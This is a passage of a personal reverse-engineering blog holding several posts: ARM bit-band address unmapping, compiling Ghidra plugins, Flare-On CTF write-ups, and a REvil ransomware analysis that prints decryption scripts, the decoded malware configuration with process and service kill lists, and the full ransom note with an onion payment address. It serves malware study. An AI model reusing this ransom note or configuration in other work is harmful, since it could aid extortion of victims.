reverse engineering on Ben's ideas and projects

Reversing ARM Cortex-M Bit Band addresses

locutus@the-collective.net (Ben Mason) — Tue, 15 Feb 2022 09:00:00 -0500

While reverse-engineering the firmware on the Digoo DG-HOSA device which I have a couple of posts on already. I ran across some memory addresses that did not directly map to peripherals. I found the address ranges are called the Bit-band range and had special functionality allowing direct access to individual bits on peripherals. This post will give a quick summary of what these addresses are and how to unmap them to the normal peripheral addresses.

What is Bit Banding?

The Bit Banding is a feature of the ARM Cortex-M3/M4 allowing you to directly access specific bits within the Peripheral and SRAM regions. Normally you need to write a whole register at a time even if you want to change a single bit. There are memory regions allocated for this purpose they are named “Bit band alias” in this snip of the Processor memory map table.

From Cortex-M3 Technical Reference

To calculate the Bit band address for a specific bit on a port you use the following formula. This formula is also found in the Cortex-M3 Technical reference.

bit_word_addr = bit_band_base + ((byte_offset x 32) + (bit_number × 4))

bit_word_offset – position of the target bit in the bit-band memory region.
bit_word_addr – address of the word in the alias memory region that maps to the targeted bit.
bit_band_base – starting address of the alias region.
byte_offset – number of the byte in the bit-band region that contains the targeted bit.
bit_number – bit position (0-7) of the targeted bit.

This was a quick introduction to bit banding if you are looking for more information check out his post which goes into great detail on this feature.

Bit-banding Explained: A Key Feature of ARM Cortex-M3/M4

Now to reverse a bit mapped address

Now that we how to forward map an address I wrote up some python code that takes in the address, unmaps it, and lists the original port and register information.

#!/usr/bin/python

def find_base_addr(bitmapped):
    if (0x22000000 < bitmapped and bitmapped < 0x23FFFFFF):
        bit_band_base = 0x22000000
        base_address = 0x20000000
    elif (0x42000000 < bitmapped and bitmapped < 0x43FFFFFF):
        bit_band_base = 0x42000000
        base_address = 0x40000000
    else:
        bit_band_base = 0
        base_address = 0
    return bit_band_base, base_address

def bitunmapper(bitmapped):
    bit_band_base, base_address = find_base_addr(bitmapped)
    unmap_port = int(((bitmapped - bit_band_base) & 0xfffff00) / 32)
    unmap_bits = int((bitmapped & 0x000000FF) / 4)
    if unmap_bits > 32:
        unmap_port += 0x4
        unmap_bits %= 32
    unmapped_address = base_address + int(unmap_port)
    
    print("Base Address: " + hex(unmapped_address))
    print("Port: " + hex(unmapped_address & 0xFFFFFF00))
    print("Register: " + hex(unmapped_address & 0x000000FF))
    print("Bit Map: " + str(int(unmap_bits)))

bitunmapper(0x4221811c)
bitunmapper(0x42218188) # GPIOB 2
bitunmapper(0x42218198) # GPIOB 6

I have also created a Ghidra plugin using this code to quickly resolve these addresses when working through a binary. You can download it from this link:
https://github.com/suidroot/ghidra_scripts/blob/main/arm-bit-unmapper.py

Finally, here is a couple of screenshots of the plugin in action.

Compiling Ghidra Plugins

locutus@the-collective.net (Ben Mason) — Tue, 18 Jan 2022 09:00:00 -0500

Recently I found a Ghidra plugin that did not have a build for the current version for Ghidra I was using, and this motivated me to figure out how to build a plugin from its source. After looking around, I did not find many writeups on building existing plugins. This writeup covers both building out the development environment that could be used for writing plugins and extending Ghidra itself and then how to compile the plugin.

Create Build Environment

The first thing you will need to do is create a development environment for compiling the plugin. I found this fantastic article from Void Start Security describing creating a Ghidra development environment using the ghidra-builder Docker container and helper scripts. I made a fork for the repo, integrating the article’s changes and other enhancements. This makes it pretty to create an image used moving forward. Here are the commands I used.

# Clone the repository
$ git clone https://github.com/suidroot/ghidra-builder.git
$ cd ghidra-builder
# Build the Docker image
$ docker-tpl/build

After the Docker image build completed, you will have two options building the plugin; you can build against the Dev source tree or the Public release. First, I will cover the Public build preparation steps.

Prepare for a Public Build

Building a plugin against the current Public build is pretty straightforward. First, you will download the current archive from the NSA Github and extract it to a folder you will create named out in the ghidra-builder folder structure. In my example, I saved the file to the ‘Downloads‘ folder in my home directory. The example commands I ran are:

# Starting in the root of the ghidra-builder folder
$ mkdir out && cd out 
# Downloaded the current Public release to Downloads
$ cp ~/Downloads/ghidra_10.1.1_PUBLIC_20211221.zip .
$ unzip ghidra_10.1.1_PUBLIC_20211221.zip 
Archive:  ghidra_10.1.1_PUBLIC_20211221.zip

.... snip...

The following section covers creating a development archive of Ghidra.

Prepare for a Dev Build

To make a Dev build of a plugin, you will first need to make a development build of Ghidra. The script build_ghidra.sh (part of this container) automatically clones from the GitHub repository, builds the source and places an archive in the out folder.

$ cd workdir
$ ../docker-tpl/run ./build_ghidra.sh

After the build of Ghidra has been completed successfully, you will need to expand the archive created by the build into the out folder.

$ cd out/
$ ls
ghidra_10.1.1_DEV_20220103_linux_x86_64.zip
$ unzip ghidra_10.1.1_DEV_20220103_linux_x86_64.zip 
Archive:  ghidra_10.1.1_DEV_20220103_linux_x86_64.zip
   creating: ghidra_10.1.1_DEV/
... snip ...
  inflating: ghidra_10.1.1_DEV/Extensions/Ghidra/ghidra_10.1.1_DEV_20220103_SleighDevTools.zip  
   creating: ghidra_10.1.1_DEV/Ghidra/Extensions/
$ cd ..

Now that we have the environment setup, we can build the plugin from its source.

Build the plugin

I initially found these instructions in wrongbaud’s posts about plugin development. In the out directory, you will need to clone or download the source of the plugin you are building. The connect to a shell in the Docker container and navigate into the source directory for the plugin. Then set the location of the Ghidra build’s directory you prepared earlier in a shell environment variable. Finally, execute the gradle command to build the plugin.

$ cd out
$ git clone https://github.com/felberj/gotools.git
Cloning into 'gotools'...
remote: Enumerating objects: 146, done.
remote: Counting objects: 100% (3/3), done.
remote: Compressing objects: 100% (3/3), done.
remote: Total 146 (delta 0), reused 1 (delta 0), pack-reused 143
Receiving objects: 100% (146/146), 38.12 KiB | 424.00 KiB/s, done.
Resolving deltas: 100% (45/45), done.
$ ../docker-tpl/run /bin/bash
+++ dirname ../docker-tpl/run
++ cd ../docker-tpl
++ pwd
+ start_dir=/home/locutus/src/ghidra-builder/docker-tpl
+ build_command=/bin/bash
+ image=dukebarman/ghidra-builder
+ docker run -it -v /home/locutus/src/ghidra-builder/workdir:/files -w /files --user dockerbot:dockerbot --rm dukebarman/ghidra-builder sh -c /bin/bash
dockerbot@c7310895154d:/files$ cd gotools/
dockerbot@c7310895154d:/files/gotools$ export GHIDRA_INSTALL_DIR=/files/out/ghidra_10.1.1_DEV/
dockerbot@c7310895154d:/files/gotools$ gradle

Welcome to Gradle 7.3!

.... snip ....

BUILD SUCCESSFUL in 56s
7 actionable tasks: 7 executed
dockerbot@c7310895154d:/files/gotools$ ls dist/
ghidra_10.1.1_DEV_20220103_gotools.zip

Now you have built the plugin for the version of Ghidra! You can install the zip archive in the version of Ghidra you are running that you built for or are using.

Flare-on 5 - 1

locutus@the-collective.net (Ben Mason) — Tue, 27 Apr 2021 09:00:00 -0400

This is a post in a series where I complete every Flare-on challenge. The landing page for all of these posts can be found here

Starting off the 5 series of challenges we have a very simple password challenge, when extracting the archive you have one file extracted.

MinesweeperChampionshipRegistration.jar: Java archive data (JAR)

When running the file, you are prompted for an invitation code. I unzipped the jar file finding the metadata and a class file. I ran strings on the class file and was able to see the flag in plain text in the file.

After entering the flag shown in strings into the prompt it is validated!

Flare-on 3 - Challenge 2

locutus@the-collective.net (Ben Mason) — Tue, 20 Apr 2021 09:00:00 -0400

This is a post in a series where I complete every Flare-on challenge. The landing page for all of these posts can be found here

The archive for this challenge included 2 files.

BusinessPapers.doc: data
DudeLocker.exe: PE32 executable (console) Intel 80386, for MS Windows

I first took a look at the .doc file and it looks to be random data.

After doing some initial analysis on the executable file, I found many references to encryption routines in the imports. This program looks to act like ransomware. Diving into the functionality, the program first looks for a directory named “Briefcase.”

If it can not open the directory, it jumps to an error accusing the person of being a reverse engineer!

After it validates, it can open the directory properly; a routine is called checking the drive’s serial number looking for a specific value. If the value doesn’t match, the program errors out. If the hard drive’s serial number matches, it jumps to the routine to decode the encryption key. The drive’s serial number and a pointer, the encoded data stored in the .data section, are passed into the mw_decode_key function.

The mw_decode_key function does what I have named it, it decodes the key used in the data encryption. It uses a simple xor loop to decode the key.

Now that we have the key decoded it is time for the program to set up and execute the encryption routines. As a way to summarize the overall process, I have created the following diagram showing the connections between all of the functions. The boxes colored in blue are handles to data structures and the boxes in green are variables containing a value. The first step in the entire process to set up the Provider which acts as a glue between the key generation functions. From here let us go through each box in numbered order.

Section 1 is used first to create a Hash of the key based on the SHA1 algorithm. Next, it takes this Hash and derives an AES256 key from the Hash and stores it the Key Handle. The key finally has its mode set a CBC cipher.

Section 2 is used to create the IV portion of the key. This is derived from an MD5 hash of the name of the file. This section writes the data to a Hash Handle then copies it out of the handle into the KP_IV parameter of the Key Handle created in section 1.

Finally, in section 3, where files are encrypted, the original file is opened and read into a File Buffer which is then read by the CryptEncrypt function that reads the Key Handle and executes the encryption writing it back to the buffer. The buffer is then written back to the original File Handler, overwriting the data on disk.

After looking over all of this crypto routine and using a debugger to extract both the main AES key and the IV key values, I created a decryption script in python to extract what I had assumed is encrypted data in the BusinessFiles.doc file. The following script uses the wincrypto and cryptodome packages to more or less follow the process I just outlined instead, decrypting the data.

# need wincrypto and cryptodome packages

from Crypto.Cipher import AES
from Crypto.Hash import MD5
from wincrypto import CryptCreateHash, CryptHashData, CryptDeriveKey
from wincrypto.constants import CALG_SHA1, CALG_AES_256
import magic

encryted = 'BusinessPapers.doc'
encypted_data = open(encryted, 'rb').read()

key = b'thosefilesreallytiedthefoldertogether'
md5_clear = bytes(encryted.lower(),"UTF-8")

# Derive Key
sha1_hasher = CryptCreateHash(CALG_SHA1)
CryptHashData(sha1_hasher, key)
d_key = CryptDeriveKey(sha1_hasher, CALG_AES_256)

# Create IV data
iv = MD5.new()
iv.update(md5_clear)

aes = AES.new(d_key.key, AES.MODE_CBC, iv=bytes.fromhex(iv.hexdigest()))
decd = aes.decrypt(encypted_data)

print (decd[:20])
print(magic.from_buffer(decd))

hFireWrite = open("test.bin", 'wb')
hFireWrite.write(decd)
hFireWrite.close()

The output of this script writes the data to disk and provides a preview of the first 20 bytes and the magic block info from the data.

b'\xff\xd8\xff\xe0\x00\x10JFIF\x00\x01\x01\x01\x00H\x00H\x00\x00'
JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=8, manufacturer=Minolta Co., Ltd., model=DiMAGE G500, orientation=upper-left, xresolution=140, yresolution=148, resolutionunit=2], baseline, precision 8, 576x410, components 3

Success we have found the flag!

Post-Script

A funny feature of this challenge is that it leaves a ransom note. The note is an image in the resources section of the file. This image is extracted and written to the disk. Then it set the wallpaper using the SystemParametersInfoW API call.

Flare-On 3 - Challenges 1

locutus@the-collective.net (Ben Mason) — Tue, 23 Mar 2021 09:00:00 -0400

This is a post in a series where I complete every Flare-on challenge. The landing page for all of these posts can be found here

This challenge is like a lot of the first levels is a password challenge decoding challenges. In the next screenshot, you can see what happens when you run the executable.

I opened the binary up in IDA and found the main function. The Main function starts off setting up handles to read input and loading a string from the .rdata section to a local variable.

Taking a look at the string that is loaded, it looks like to be some encoded text. I guess that it is more than likely the password.

Back to the main function, after collecting the inputted password guess from the command line, it takes the inputted string and runs a function to encode it.

Looking at the encoder function I found what looks like a non-standard Base64 character set.

I took the custom Base64, the encoded string I found earlier, and entered them into CyberChef to decode the string. It returns what looks to be the flag.

To be sure I re-ran the challenge and enter the output and bingo it validates the flag!

Flare-on 2 - Challenge 5

locutus@the-collective.net (Ben Mason) — Tue, 02 Mar 2021 09:00:00 -0500

This is a post in a series where I complete every Flare-on challenge. The landing page for all of these posts can be found here

This challenge includes two files, a packet capture formatted in PCAP format and a Windows binary.

Opening up the PCAP in Wireshark, I found multiple HTTP streams submitting POST requests. I looked at each of these POST requests and saw they all have a few bytes of content.

I copied the data from each of these HTTP POST requests and found what looked like a Base64 encoded string.

UDYs1D7bNmdE1o3g5ms1V6RrYCVvODJF1DqxKTxAJ9xuZW=

When I attempted to decode it using standard Base64 character sets I did not find any recognizable data. I knew that it wouldn’t be that easy.

Looking at the strings in the binary, I found two interesting strings, “flarebearstare” which could be a password, and another string that looks like a Base64 alphabet with the uppercase and lower case sections swapped in order.

I following the cross-reference for the “flarebearstare” string, finding a function with a data decoder loop. This function is passed data and loops through each byte, subtracting each character in order of “flarebearstare” from the current byte.

Looking over this functionality, I started to write up some code to decode the flag. I grabbed a Base64 library that needed a small modification to use a custom character set. My fork of the code can be found at this repo.

https://github.com/suidroot/Python-Base64

In the screenshot below, you can see my final script in a Jupyter notebook. As an aside, I have been using it for many challenges and other projects to test out decoder and other functionality. They have been instrumental in quick prototyping and experimentation.

Success there mostly is the flag. You can see there is some weirdness in the decoding of the flag, but this script decodes the main part of it needed in my mind to call it a solution.

Full Code

b64encoded = "UDYs1D7bNmdE1o3g5ms1V6RrYCVvODJF1DqxKTxAJ9xuZW=="
b64_alphabet = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/'

b = b64()
b64decoded = b.decode(b64encoded, alttable=b64_alphabet)

for i in b64decoded:
    print (hex(ord(i)) + " ", end="")

print ()
count = 1

key = "flarebearstare"
key_len = len(key)

output = ""
counter = 0

for i in b64decoded:
    temp = ord(i) - ord(key[counter])
    
    print (chr(temp),end="")

    #print (i, hex(temp), key[counter], chr(temp))
    output += chr(temp)
    
    if counter+1 < key_len:
        counter+=1
    else:
        counter = 0

Reversing Revil Malware – Part 2 - String Obfuscation and Configuration Setup

locutus@the-collective.net (Ben Mason) — Wed, 24 Feb 2021 09:00:00 -0500

This is the second in a series looking at part of the Revil malware. The first post covered a triage and unpacking of the first stage. The post will look at the high-level flow and look in-depth at the configuration embedded in the sample and some options.

Revil Process Diagram

Looking at the flow diagram (shown above), there is a pretty straightforward flow to the sample. It initially sets itself up by resolving the import table, reading the embedded configuration data, and command-line arguments. After the initial configuration is loaded and processed, the sample starts to execute the encryption and beaconing activities. Finally, it cleans up after itself clearing itself from memory, deleting itself from disk, and exiting. Now that we have an overview of this stage, we will look at how strings are obscured and how the configuration is loaded and processed.

String Encryption

When you run a string identification tool on this binary, you find there are not many readable strings. This sample obscures the vast majority of its strings. When analyzing it, you see many calls similar to this example.

This function located at 0x0040575B uses RC4 to decrypt the strings from a data block located at either 0x0040F270 or 004101B0. These blocks contain both the key and the encrypted data itself. The function is passed a pointer to the data block, offsets of the key and encrypted data, key size, and data size. It returns the clear string as the last parameter of the function call.

In the function that I labeled “mw_run_rc4_decrypt” (0x0040646A), you find a fairly standard RC4 decryption set of routines. I have recreated this functionally in python, which I used heavily when analyzing this sample to label the string variables.

!pip3 install arc4
from arc4 import ARC4
import pefile
import binascii

secondstage = "file1.bin"

pe = pefile.PE(secondstage)
section_offest = 0xf000

for section in pe.sections:
    if b".data" in section.Name:
        hex_data_1 = section.get_data()[(0x101b0-section_offest):]
        hex_data_2 = section.get_data()[(0xf270-section_offest):(0xf17)]

def decrypt(data, position, keylen, datasize):
        
    key = data[position:position+keylen]
    cipher = ARC4(key)
    rc4_data = cipher.decrypt(data[position+keylen:position+keylen+datasize])
    
    # Convert to string
    string_data = ""
    for byte in rc4_data:
        string_data += chr(byte)
    
    return string_data

Revil Configuration

The encrypted configuration is stored in the .7tdlvx section of the binary. The data is RC4 encrypted like string data was. It also includes some tamper protection; there is a CRC32 value stored with the data. Below is the structure of the configuration section. I have labeled the data segments with numbers.

Decryption Key
crc32 Checksum
Configuration Size
Start of Encrypted configuration

The function shown in the image below is used to decrypt the data from the 7tdlvx section. When executed, the CRC32 value of the data is checked, and if it matches, the function is called to run the RC4 decryption. Pointers to the key, key length, address of the encrypted data, and size of the encrypted data are passed into the function to decrypt the data.

After the RC4 decryption, it returns a block of JSON data to a variable for further processing. Below is an abbreviated version of the configuration for readability. I put a full copy of it at the end of this post.

{'arn': False,
 'dbg': False,
 'dmn': '',
 'et': 0,
 'exp': False,
 'img': 'QQBsAGwAIABvAGYAIAB5AG8AdQByACAAZgBpAGwAZQBzACAAYQByAGUAIABlAG... AHMAdAB1AGMAdABpAG8AbgBzAAAA',
 'nbody': 'LQAtAC0APQA9AD0AIABXAGUAbABjAG8AbQBlAC4AIABBAGcAYQBpAG4ALgAgAD ... ACEAIAAhACEAIQAgACEAIQAAAA==',
 'net': False,
 'nname': '{EXT}-README.txt',
 'pid': '$2b$13$wz1reRfdLg.aiStLDqg5JeqqySemSPatWKHdwbpWVrC3ty7Akscg6',
 'pk': 'SrxAOJ8RkDIIb7jurGu3kJGcui9QRzgmLyRe3dUxNSI=',
 'prc': ['vsnapvss',
         'EnterpriseClient',
         'firefox',
         ..
         'excel',
         'msaccess',
         'agntsvc'],
 'spsize': 1,
 'sub': '58',
 'svc': ['QBCFMonitorService',
         ..
         'saphostexec'],
 'wfld': ['backup', 'bkp', 'archive'],
 'wht': {'ext': ['dll',
                 ..
                 'cur'],
         'fld': ['program files',
                 ..
                 '$recycle.bin'],
         'fls': ['ntuser.ini',
                 ..
                 'thumbs.db']},
 'wipe': True}

To assist in processing and analysis of the configuration I created the following python script to extract and parse the configuration file from the sample.

!pip3 install arc4
from arc4 import ARC4
import pefile
import binascii
import json
import pprint as pp

secondstage = "file1.bin"

try:
   pe
except NameError:
    pe = pefile.PE(secondstage)

key_len = 0x20
section_name = ".7tdlvx"

# located in the .7tdlvx section
for section in pe.sections:
    if bytes(section_name, 'utf-8') in section.Name:
        section_data = section.get_data()

key = section_data[:key_len]
crc = section_data[key_len:key_len+0x4]
config_len = int.from_bytes(section_data[key_len+0x4:key_len+0x8], "little")
print(hex(config_len))
data_3_hex = section_data[key_len+0x8:config_len+key_len+0x8]

print (len(data_3_hex))

cipher = ARC4(key)
dump = cipher.decrypt(data_3_hex)

# Store JSON to file
f = open("config_decoded.txt", "wb")
f.write(bytearray(dump))
f.close()

cfg = json.loads(dump[:-1])
pp.pprint(cfg)

As shown in the configuration example, the configuration is in a JSON-like format that needs to be parsed further to be used by the malware. In the first part of the parsing process, an array is built out, defining the elements and how to process them. The three elements in the example below are and string for the JSON key, an integer for the data type, and a function pointer to the function to parse the data.

// String with configuration Name
configuration_structure[0] = (int)&str_pk;
// Data Type
configuration_structure[1] = 5;
// Funcation to handle the data and write it to a Global Variable
configuration_structure[2] = (int)mw_cfg_pk_decoder;

The parser array along and decrypted configuration are passed into a function the walks through the JSON configuration. The function searches for the keys in the JSON configuration, and the parser function is called to process the configuration content.

Some examples of configuration values that take further processing are ‘pk’, ‘img’, and ‘nbody’. These are all base64 encoded strings that are decoded before being stored in memory. Using the following python code we can see the values stored in these keys.

import base64
import binascii

print("pk: " + str(binascii.hexlify(base64.b64decode(cfg['pk']))))
print("img: " + str(base64.b64decode(cfg['img']).decode('utf-16')))
print("nbody: " + str(base64.b64decode(cfg['nbody']).decode('utf-16'))

pk: b'4abc40389f119032086fb8eeac6bb790919cba2f504738262f245eddd5313522'
img: All of your files are encrypted!

Find {EXT}-README.txt and follow instuctions
nbody: ---=== Welcome. Again. ===---

[+] What's Happened? [+]

Your files have been encrypted and currently unavailable. You can check it. All files in your system have {EXT} extension. By the way, everything is possible to recover (restore) but you should follow our instructions. Otherwise you can NEVER return your data.

[+] What are our guarantees? [+]

It's just a business and we care only about getting benefits. If we don't meet our obligations, nobody will deal with us. It doesn't hold our interest. So you can check the ability to restore your files. For this purpose you should visit our website where you can decrypt one file for free. That is our guarantee.
It doesn't metter for us whether you cooperate with us or not. But if you don't, you'll lose your time and data cause only we have the private key to decrypt your files. In practice - time is much more valuable than money.

[+] How to get access to our website? [+]

Use TOR browser:
  1. Download and install TOR browser from this site: https://torproject.org/
  2. Visit our website: http://4to43yp4mng2gdc3jgnep5bt7lkhqvjqiritbv4x2ebj3qun7wz4y2id.onion

When you visit our website, put the following data into the input form:
Key:


{KEY}


!!! DANGER !!!
DON'T try to change files by yourself, DON'T use any third party software or antivirus solutions to  restore your data - it may entail the private key damage and as a result all your data loss!
!!! !!! !!!
ONE MORE TIME: It's in your best interests to get your files back. From our side we (the best specialists in this sphere) ready to make everything for restoring but please do not interfere.
!!! !!! !!

Conclusion

We covered a couple of the obfuscation functions in this stage of the malware, the use of RC4 in many places to hide plain text data making various functions harder to detect and reverse engineer. The configuration section allows for a lot of flexibility. I can imagine allowing for a fair amount of automation in the build system, simplifying the building and deploy time. The next post will cover the file encryption function section of the code.

Configuration Keys

The key below is a select list of some of the configuration options that affect the flow or functionality of the sample. There are many more keys shown in the full configuration.

Config Key	Usage
dbg	Debug mode?
et	Fast or Full Encryption
dmn	Domain to Beacon
net	Do HTTP beaconing?
arn	Add Run Key?
nbody	Ransom note text
nname	Ransom note filename
img	Desktop Background Text

Full configuration

{'arn': False,
 'dbg': False,
 'dmn': '',
 'et': 0,
 'exp': False,
 'img': 'QQBsAGwAIABvAGYAIAB5AG8AdQByACAAZgBpAGwAZQBzACAAYQByAGUAIABlAG4AYwByAHkAcAB0AGUAZAAhAA0ACgANAAoARgBpAG4AZAAgAHsARQBYAFQAfQAtAFIARQBBAEQATQBFAC4AdAB4AHQAIABhAG4AZAAgAGYAbwBsAGwAbwB3ACAAaQBuAHMAdAB1AGMAdABpAG8AbgBzAAAA',
 'nbody': 'LQAtAC0APQA9AD0AIABXAGUAbABjAG8AbQBlAC4AIABBAGcAYQBpAG4ALgAgAD0APQA9AC0ALQAtAA0ACgANAAoAWwArAF0AIABXAGgAYQB0ACcAcwAgAEgAYQBwAHAAZQBuAGUAZAA/ACAAWwArAF0ADQAKAA0ACgBZAG8AdQByACAAZgBpAGwAZQBzACAAaABhAHYAZQAgAGIAZQBlAG4AIABlAG4AYwByAHkAcAB0AGUAZAAgAGEAbgBkACAAYwB1AHIAcgBlAG4AdABsAHkAIAB1AG4AYQB2AGEAaQBsAGEAYgBsAGUALgAgAFkAbwB1ACAAYwBhAG4AIABjAGgAZQBjAGsAIABpAHQALgAgAEEAbABsACAAZgBpAGwAZQBzACAAaQBuACAAeQBvAHUAcgAgAHMAeQBzAHQAZQBtACAAaABhAHYAZQAgAHsARQBYAFQAfQAgAGUAeAB0AGUAbgBzAGkAbwBuAC4AIABCAHkAIAB0AGgAZQAgAHcAYQB5ACwAIABlAHYAZQByAHkAdABoAGkAbgBnACAAaQBzACAAcABvAHMAcwBpAGIAbABlACAAdABvACAAcgBlAGMAbwB2AGUAcgAgACgAcgBlAHMAdABvAHIAZQApACAAYgB1AHQAIAB5AG8AdQAgAHMAaABvAHUAbABkACAAZgBvAGwAbABvAHcAIABvAHUAcgAgAGkAbgBzAHQAcgB1AGMAdABpAG8AbgBzAC4AIABPAHQAaABlAHIAdwBpAHMAZQAgAHkAbwB1ACAAYwBhAG4AIABOAEUAVgBFAFIAIAByAGUAdAB1AHIAbgAgAHkAbwB1AHIAIABkAGEAdABhAC4ADQAKAA0ACgBbACsAXQAgAFcAaABhAHQAIABhAHIAZQAgAG8AdQByACAAZwB1AGEAcgBhAG4AdABlAGUAcwA/ACAAWwArAF0ADQAKAA0ACgBJAHQAJwBzACAAagB1AHMAdAAgAGEAIABiAHUAcwBpAG4AZQBzAHMAIABhAG4AZAAgAHcAZQAgAGMAYQByAGUAIABvAG4AbAB5ACAAYQBiAG8AdQB0ACAAZwBlAHQAdABpAG4AZwAgAGIAZQBuAGUAZgBpAHQAcwAuACAASQBmACAAdwBlACAAZABvAG4AJwB0ACAAbQBlAGUAdAAgAG8AdQByACAAbwBiAGwAaQBnAGEAdABpAG8AbgBzACwAIABuAG8AYgBvAGQAeQAgAHcAaQBsAGwAIABkAGUAYQBsACAAdwBpAHQAaAAgAHUAcwAuACAASQB0ACAAZABvAGUAcwBuACcAdAAgAGgAbwBsAGQAIABvAHUAcgAgAGkAbgB0AGUAcgBlAHMAdAAuACAAUwBvACAAeQBvAHUAIABjAGEAbgAgAGMAaABlAGMAawAgAHQAaABlACAAYQBiAGkAbABpAHQAeQAgAHQAbwAgAHIAZQBzAHQAbwByAGUAIAB5AG8AdQByACAAZgBpAGwAZQBzAC4AIABGAG8AcgAgAHQAaABpAHMAIABwAHUAcgBwAG8AcwBlACAAeQBvAHUAIABzAGgAbwB1AGwAZAAgAHYAaQBzAGkAdAAgAG8AdQByACAAdwBlAGIAcwBpAHQAZQAgAHcAaABlAHIAZQAgAHkAbwB1ACAAYwBhAG4AIABkAGUAYwByAHkAcAB0ACAAbwBuAGUAIABmAGkAbABlACAAZgBvAHIAIABmAHIAZQBlAC4AIABUAGgAYQB0ACAAaQBzACAAbwB1AHIAIABnAHUAYQByAGEAbgB0AGUAZQAuAA0ACgBJAHQAIABkAG8AZQBzAG4AJwB0ACAAbQBlAHQAdABlAHIAIABmAG8AcgAgAHUAcwAgAHcAaABlAHQAaABlAHIAIAB5AG8AdQAgAGMAbwBvAHAAZQByAGEAdABlACAAdwBpAHQAaAAgAHUAcwAgAG8AcgAgAG4AbwB0AC4AIABCAHUAdAAgAGkAZgAgAHkAbwB1ACAAZABvAG4AJwB0ACwAIAB5AG8AdQAnAGwAbAAgAGwAbwBzAGUAIAB5AG8AdQByACAAdABpAG0AZQAgAGEAbgBkACAAZABhAHQAYQAgAGMAYQB1AHMAZQAgAG8AbgBsAHkAIAB3AGUAIABoAGEAdgBlACAAdABoAGUAIABwAHIAaQB2AGEAdABlACAAawBlAHkAIAB0AG8AIABkAGUAYwByAHkAcAB0ACAAeQBvAHUAcgAgAGYAaQBsAGUAcwAuACAASQBuACAAcAByAGEAYwB0AGkAYwBlACAALQAgAHQAaQBtAGUAIABpAHMAIABtAHUAYwBoACAAbQBvAHIAZQAgAHYAYQBsAHUAYQBiAGwAZQAgAHQAaABhAG4AIABtAG8AbgBlAHkALgANAAoADQAKAFsAKwBdACAASABvAHcAIAB0AG8AIABnAGUAdAAgAGEAYwBjAGUAcwBzACAAdABvACAAbwB1AHIAIAB3AGUAYgBzAGkAdABlAD8AIABbACsAXQANAAoADQAKAFUAcwBlACAAVABPAFIAIABiAHIAbwB3AHMAZQByADoADQAKACAAIAAxAC4AIABEAG8AdwBuAGwAbwBhAGQAIABhAG4AZAAgAGkAbgBzAHQAYQBsAGwAIABUAE8AUgAgAGIAcgBvAHcAcwBlAHIAIABmAHIAbwBtACAAdABoAGkAcwAgAHMAaQB0AGUAOgAgAGgAdAB0AHAAcwA6AC8ALwB0AG8AcgBwAHIAbwBqAGUAYwB0AC4AbwByAGcALwANAAoAIAAgADIALgAgAFYAaQBzAGkAdAAgAG8AdQByACAAdwBlAGIAcwBpAHQAZQA6ACAAaAB0AHQAcAA6AC8ALwA0AHQAbwA0ADMAeQBwADQAbQBuAGcAMgBnAGQAYwAzAGoAZwBuAGUAcAA1AGIAdAA3AGwAawBoAHEAdgBqAHEAaQByAGkAdABiAHYANAB4ADIAZQBiAGoAMwBxAHUAbgA3AHcAegA0AHkAMgBpAGQALgBvAG4AaQBvAG4ADQAKAA0ACgBXAGgAZQBuACAAeQBvAHUAIAB2AGkAcwBpAHQAIABvAHUAcgAgAHcAZQBiAHMAaQB0AGUALAAgAHAAdQB0ACAAdABoAGUAIABmAG8AbABsAG8AdwBpAG4AZwAgAGQAYQB0AGEAIABpAG4AdABvACAAdABoAGUAIABpAG4AcAB1AHQAIABmAG8AcgBtADoADQAKAEsAZQB5ADoADQAKAA0ACgANAAoAewBLAEUAWQB9AA0ACgANAAoADQAKACEAIQAhACAARABBAE4ARwBFAFIAIAAhACEAIQANAAoARABPAE4AJwBUACAAdAByAHkAIAB0AG8AIABjAGgAYQBuAGcAZQAgAGYAaQBsAGUAcwAgAGIAeQAgAHkAbwB1AHIAcwBlAGwAZgAsACAARABPAE4AJwBUACAAdQBzAGUAIABhAG4AeQAgAHQAaABpAHIAZAAgAHAAYQByAHQAeQAgAHMAbwBmAHQAdwBhAHIAZQAgAG8AcgAgAGEAbgB0AGkAdgBpAHIAdQBzACAAcwBvAGwAdQB0AGkAbwBuAHMAIAB0AG8AIAAgAHIAZQBzAHQAbwByAGUAIAB5AG8AdQByACAAZABhAHQAYQAgAC0AIABpAHQAIABtAGEAeQAgAGUAbgB0AGEAaQBsACAAdABoAGUAIABwAHIAaQB2AGEAdABlACAAawBlAHkAIABkAGEAbQBhAGcAZQAgAGEAbgBkACAAYQBzACAAYQAgAHIAZQBzAHUAbAB0ACAAYQBsAGwAIAB5AG8AdQByACAAZABhAHQAYQAgAGwAbwBzAHMAIQANAAoAIQAhACEAIAAhACEAIQAgACEAIQAhAA0ACgBPAE4ARQAgAE0ATwBSAEUAIABUAEkATQBFADoAIABJAHQAJwBzACAAaQBuACAAeQBvAHUAcgAgAGIAZQBzAHQAIABpAG4AdABlAHIAZQBzAHQAcwAgAHQAbwAgAGcAZQB0ACAAeQBvAHUAcgAgAGYAaQBsAGUAcwAgAGIAYQBjAGsALgAgAEYAcgBvAG0AIABvAHUAcgAgAHMAaQBkAGUAIAB3AGUAIAAoAHQAaABlACAAYgBlAHMAdAAgAHMAcABlAGMAaQBhAGwAaQBzAHQAcwAgAGkAbgAgAHQAaABpAHMAIABzAHAAaABlAHIAZQApACAAcgBlAGEAZAB5ACAAdABvACAAbQBhAGsAZQAgAGUAdgBlAHIAeQB0AGgAaQBuAGcAIABmAG8AcgAgAHIAZQBzAHQAbwByAGkAbgBnACAAYgB1AHQAIABwAGwAZQBhAHMAZQAgAGQAbwAgAG4AbwB0ACAAaQBuAHQAZQByAGYAZQByAGUALgANAAoAIQAhACEAIAAhACEAIQAgACEAIQAAAA==',
 'net': False,
 'nname': '{EXT}-README.txt',
 'pid': '$2b$13$wz1reRfdLg.aiStLDqg5JeqqySemSPatWKHdwbpWVrC3ty7Akscg6',
 'pk': 'SrxAOJ8RkDIIb7jurGu3kJGcui9QRzgmLyRe3dUxNSI=',
 'prc': ['vsnapvss',
         'EnterpriseClient',
         'firefox',
         'infopath',
         'cvd',
         'tv_x64.exe',
         'VeeamTransportSvc',
         'steam',
         'encsvc',
         'mydesktopservice',
         'outlook',
         'synctime',
         'ocssd',
         'SAP',
         'cvfwd',
         'bengien',
         'vxmon',
         'bedbh',
         'ocomm',
